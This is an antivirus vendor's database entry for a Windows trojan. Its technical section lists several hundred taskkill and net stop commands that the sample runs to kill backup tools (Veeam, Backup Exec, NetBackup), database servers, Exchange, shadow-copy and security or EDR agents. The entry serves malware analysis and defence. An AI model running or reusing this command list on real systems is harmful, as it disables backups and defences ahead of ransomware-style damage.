Trojan.MulDrop16.12738

Added to the Dr.Web virus database: 2021-03-01

Virus description added:

Technical Information

Malicious functions
Executes the following
  • '<SYSTEM32>\taskkill.exe' /IM BackupExec.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBox.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-tray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlmangr.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxiosvr.exe
  • '<SYSTEM32>\taskkill.exe' /IM vmtoolsd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM "SqlBak.Service.exe" /F
  • '<SYSTEM32>\net.exe' stop "SQLBackupAndFTP Client Service"
  • '<SYSTEM32>\taskkill.exe' /F /IM VeeamDeploymentSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRTPortable.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sshd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mssearch.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxcom.exe
  • '<SYSTEM32>\taskkill.exe' /IM ssms.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlceip.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "SAP Business One.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM beremote.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Guest.Interaction.Proxy.exe
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRT.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM node.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RavTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxwin64.exe
  • '<SYSTEM32>\taskkill.exe' /IM sqlbrowser.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "Cobian.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F
  • '<SYSTEM32>\taskkill.exe' /F /IM VeeamNFSSvc.exe
  • '<SYSTEM32>\net.exe' stop cbVSCService
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlbrowser.exe
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBoxVM.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlwriter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseSvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Sage.NA.AT_AU.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM yundetectservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeMailboxReplication.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM VeeamTransportSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSVC.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iempwatchdog.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msftesql.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM baidunetdisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.WmiServer.exe
  • '<SYSTEM32>\net.exe' stop SBOWorkflowEngine
  • '<SYSTEM32>\net.exe' stop SBOWFDataAccess
  • '<SYSTEM32>\net.exe' stop SBOMail
  • '<SYSTEM32>\taskkill.exe' /F /IM store.exe
  • '<SYSTEM32>\net.exe' stop SBOJobServiceBackEnd
  • '<SYSTEM32>\net.exe' stop SBODI_Server
  • '<SYSTEM32>\net.exe' stop SBOClientAgent
  • '<SYSTEM32>\net.exe' stop SAPB1iEventSender
  • '<SYSTEM32>\net.exe' stop "SAPB1iDIProxy_Monitor"
  • '<SYSTEM32>\net.exe' stop SAPB1iDIProxy
  • '<SYSTEM32>\net.exe' stop "SAP Business One RSP Agent Service"
  • '<SYSTEM32>\taskkill.exe' /IM bedbg.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM rdm.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.ProtectedServiceHost.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM "FileZilla Server.exe"
  • '<SYSTEM32>\taskkill.exe' /IM SqlManagement.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM bengine.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MessageNotification.exe /F
  • '<SYSTEM32>\net.exe' stop UFNet
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CloudService.exe
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent-daemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM CCenter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fdhost.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Launchpad.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tomcat9.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BackupExecManagementService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ServerNT.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CatalogDataService.exe
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer_Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SogouImeBroker.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM licenceserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM java.exe /F
  • '<SYSTEM32>\net.exe' stop UTUService
  • '<SYSTEM32>\taskkill.exe' /IM UFSoft.U8.OC.QuartzScheduler.exe /F
  • '<SYSTEM32>\net.exe' stop UFReportService
  • '<SYSTEM32>\taskkill.exe' /IM ScanFrm.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM eSightService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM beserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TongBackupSrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wampmanager.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxwin32.exe
  • '<SYSTEM32>\taskkill.exe' /IM softmgrlite.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM UFMsgCenterService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM pvlsvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM tv_x64.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wrapper.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RsTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM cbInterface.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM Sage.NA.AT_AU.SysTray.exe
  • '<SYSTEM32>\taskkill.exe' /IM RemoteAssistProcess.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mpdwsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.MountService.exe
  • '<SYSTEM32>\taskkill.exe' /IM tv_w32.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cygrunsrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM d_manage.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM cbService.exe
  • '<SYSTEM32>\taskkill.exe' /IM Veeam.Backup.Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM benetns.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cbVSCService11.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Manager.exe
  • '<SYSTEM32>\taskkill.exe' /IM CasLicenceServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cbService.exe /F
  • '<SYSTEM32>\net.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\taskkill.exe' /IM ssclient.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM w3wp.exe
  • '<SYSTEM32>\taskkill.exe' /IM DumpServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.Search.ExSearch.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM mysqld.exe
  • '<SYSTEM32>\taskkill.exe' /IM dinotify.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM IDDAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchange.NodeService.ein /F
  • '<SYSTEM32>\taskkill.exe' /IM DisklessServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM msexchangerepl.exe
  • '<SYSTEM32>\taskkill.exe' /IM Tencentdll.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM mysql.exe
  • '<SYSTEM32>\taskkill.exe' /IM His6Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AutoDealService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchangeService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ControlServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TXPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeMailboxAssistants.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM msmdsrv.exe
  • '<SYSTEM32>\taskkill.exe' /IM fppdis5.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM UIODetect.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MsDtsSrvr.exe
  • '<SYSTEM32>\taskkill.exe' /IM BsAgent_0.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM perl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM EnergyDataService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM JhTask.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.EdgeSyncSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM HaoZipScan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoogleCrashHandler.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Launchpad.exe
  • '<SYSTEM32>\taskkill.exe' /IM SoftMemory.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeTransport.exe
  • '<SYSTEM32>\taskkill.exe' /IM ap_nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM HaoZip.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM UFSoft.U8.OC.QuartzScheduler.exe
  • '<SYSTEM32>\taskkill.exe' /IM service_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM WeChat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClientMonitor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM emagent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM QQ.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TransMain.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM SageCSClient.exe
  • '<SYSTEM32>\taskkill.exe' /IM PersonUDisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MsExchangeFDS.exe
  • '<SYSTEM32>\taskkill.exe' /IM Executer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM jenkins.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MPService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM wsusservice.exe
  • '<SYSTEM32>\taskkill.exe' /IM NetDiskServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AllPassCBHost.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe
  • '<SYSTEM32>\taskkill.exe' /IM fdlauncher.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PrivacyIconClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM DataCollectorSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM OPCClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ipc_proxy.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxEM.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeTransportLogSearch.exe
  • '<SYSTEM32>\taskkill.exe' /IM BarCMService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlwriter.exe
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseConsole.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "phpStudy.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM sfupdatemgr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RAVCp164.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM EdgeTransport.exe
  • '<SYSTEM32>\taskkill.exe' /IM GoodGameSrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlservr.exe
  • '<SYSTEM32>\taskkill.exe' /IM "notepad++.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM TNSLSNR.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_monitor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNAupdaemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeThrottling.exe
  • '<SYSTEM32>\taskkill.exe' /IM BarMoniService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlceip.exe
  • '<SYSTEM32>\taskkill.exe' /IM abs_deployer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM php.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlagentc.exe
  • '<SYSTEM32>\taskkill.exe' /IM igfxHK.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM SOUNDMAN.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxMonitorService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM fdlauncher.exe
  • '<SYSTEM32>\taskkill.exe' /IM IcafeServicesTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.ServiceHost.exe
  • '<SYSTEM32>\taskkill.exe' /IM MySQLNotifier.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNCEFExternal.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM fdhost.exe
  • '<SYSTEM32>\taskkill.exe' /IM SunloginClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sfavsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarServerView.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oravssw.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oracle.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM 360bdoctor.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Ssms.exe
  • '<SYSTEM32>\taskkill.exe' /IM SupportAssistAgent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_sec_plan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoodGame.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM ReportingServicesService.exe
  • '<SYSTEM32>\taskkill.exe' /IM igfxTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.AddressBook.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM AutoBackUpEx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM navicat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM redis-server.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM aspnet_state.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mdm.exe /F
  • '<SYSTEM32>\net.exe' stop UFAllNet
  • '<SYSTEM32>\net.exe' stop U8WebPool
  • '<SYSTEM32>\net.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\net.exe' stop QPCore
  • '<SYSTEM32>\net.exe' stop Service2
  • '<SYSTEM32>\net.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\net.exe' stop "SQLAgent"
  • '<SYSTEM32>\net.exe' stop TeamViewer
  • '<SYSTEM32>\net.exe' stop JWService
  • '<SYSTEM32>\net.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-nt.exe /F
  • '<SYSTEM32>\net.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\net.exe' stop vmvss
  • '<SYSTEM32>\net.exe' stop "MSSQL"
  • '<SYSTEM32>\net.exe' stop Tomcat8
  • '<SYSTEM32>\net.exe' stop JWRinfoClientService
  • '<SYSTEM32>\net.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\net.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\net.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\net.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop SQLWriter
  • '<SYSTEM32>\net.exe' stop CASLicenceServer
  • '<SYSTEM32>\net.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net.exe' stop "ReportServer"
  • '<SYSTEM32>\net.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net.exe' stop "AliyunService"
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\net.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net.exe' stop VMnetDHCP
  • '<SYSTEM32>\net.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\net.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\net.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net.exe' stop AutoUpdateService
  • '<SYSTEM32>\net.exe' stop AdobeARMservice
  • '<SYSTEM32>\net.exe' stop MSExchangeHM
  • '<SYSTEM32>\net.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net.exe' stop CASWebServer
  • '<SYSTEM32>\net.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\taskkill.exe' /IM AppMain.exe /F
  • '<SYSTEM32>\net.exe' stop CASXMLService
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\net.exe' stop TeamViewer8
  • '<SYSTEM32>\net.exe' stop Realtek11nSU
  • '<SYSTEM32>\net.exe' stop "memcached Server"
  • '<SYSTEM32>\net.exe' stop MSSQL$
  • '<SYSTEM32>\net.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop VMwareHostd
  • '<SYSTEM32>\net.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net.exe' stop U8WorkerService2
  • '<SYSTEM32>\net.exe' stop "SQLBrowser"
  • '<SYSTEM32>\net.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\taskkill.exe' /IM DDSoftPwsTomcat9.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Tomcat7w.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\net.exe' stop UIODetect
  • '<SYSTEM32>\taskkill.exe' /IM pg_ctl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ThunderPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSDS.exe /F
  • '<SYSTEM32>\net.exe' stop HaoZipSvc
  • '<SYSTEM32>\net.exe' stop U8WorkerService1
  • '<SYSTEM32>\taskkill.exe' /IM ReportingServicesService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Agent.ConfigurationService.exe
  • '<SYSTEM32>\net.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\net.exe' stop Apache2.4
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop xenlite
  • '<SYSTEM32>\net.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop VMUSBArbService
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\net.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net.exe' stop mysqltransport
  • '<SYSTEM32>\net.exe' stop vss
  • '<SYSTEM32>\net.exe' stop "SQLWrite"
  • '<SYSTEM32>\net.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\net.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net.exe' stop WebAttendServer
  • '<SYSTEM32>\net.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net.exe' stop Apache2.2
  • '<SYSTEM32>\net.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\net.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop UFIDAWebService
  • '<SYSTEM32>\net.exe' stop XenSvc
  • '<SYSTEM32>\net.exe' stop VMAuthdService
  • '<SYSTEM32>\net.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\net.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\net.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop SQLBrowser
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeMailSubmission.exe
  • '<SYSTEM32>\net.exe' stop "TMBMServer"
  • '<SYSTEM32>\net.exe' stop AGSService
  • '<SYSTEM32>\net.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\net.exe' stop "Bonjour Service"
  • '<SYSTEM32>\net.exe' stop GNWebService
  • '<SYSTEM32>\net.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net.exe' stop CobianBackup10
  • '<SYSTEM32>\net.exe' stop pcas
  • '<SYSTEM32>\net.exe' stop RTCAVMCU
  • '<SYSTEM32>\net.exe' stop KugouService
  • '<SYSTEM32>\net.exe' stop NFVPrintServer
  • '<SYSTEM32>\net.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net.exe' stop K3ClouManager
  • '<SYSTEM32>\net.exe' stop KpService
  • '<SYSTEM32>\net.exe' stop EvtSys
  • '<SYSTEM32>\net.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net.exe' stop IngressMgr
  • '<SYSTEM32>\net.exe' stop DFServ
  • '<SYSTEM32>\net.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net.exe' stop RavService
  • '<SYSTEM32>\net.exe' stop OMAILREPORT
  • '<SYSTEM32>\net.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net.exe' stop NFLicenceServer
  • '<SYSTEM32>\net.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\net.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\net.exe' stop AgentX
  • '<SYSTEM32>\net.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net.exe' stop d_safe
  • '<SYSTEM32>\net.exe' stop U8TaskService
  • '<SYSTEM32>\net.exe' stop U8SLReportService
  • '<SYSTEM32>\net.exe' stop U8SCMPool
  • '<SYSTEM32>\net.exe' stop U8MPool
  • '<SYSTEM32>\taskkill.exe' /IM U8CEServer.exe /F
  • '<SYSTEM32>\net.exe' stop U8KeyManagePool
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.BrokerService.exe
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iexplore.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM rcrelay.exe /F
  • '<SYSTEM32>\net.exe' stop ImtsEventSvr
  • '<SYSTEM32>\taskkill.exe' /IM httpd.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeIS
  • '<SYSTEM32>\taskkill.exe' /IM Att.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM NFVPrint.exe /F
  • '<SYSTEM32>\net.exe' stop U8GCService
  • '<SYSTEM32>\net.exe' stop U8EncryptService
  • '<SYSTEM32>\net.exe' stop U8EISService
  • '<SYSTEM32>\net.exe' stop NFOTPService
  • '<SYSTEM32>\net.exe' stop U8DispatchService
  • '<SYSTEM32>\net.exe' stop NFSysService
  • '<SYSTEM32>\net.exe' stop TurboCRM70
  • '<SYSTEM32>\net.exe' stop DGPNPSEV
  • '<SYSTEM32>\taskkill.exe' /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClient.exe /F
  • '<SYSTEM32>\net.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\net.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeRepl
  • '<SYSTEM32>\net.exe' stop CASMsgSrv
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\net.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net.exe' stop MSExchangePop3
  • '<SYSTEM32>\net.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\net.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\net.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop DDNSService
  • '<SYSTEM32>\net.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\net.exe' stop RapService
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\net.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\net.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\net.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net.exe' stop RavTask
  • '<SYSTEM32>\net.exe' stop MSExchangeUM
  • '<SYSTEM32>\net.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\net.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\net.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net.exe' stop MySQL5_OA
  • '<SYSTEM32>\net.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net.exe' stop AngelOfDeath
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net.exe' stop ServiceMid
  • '<SYSTEM32>\net.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net.exe' stop tmlisten
  • '<SYSTEM32>\net.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\net.exe' stop MySQL
  • '<SYSTEM32>\net.exe' stop VeeamDistributionSvc
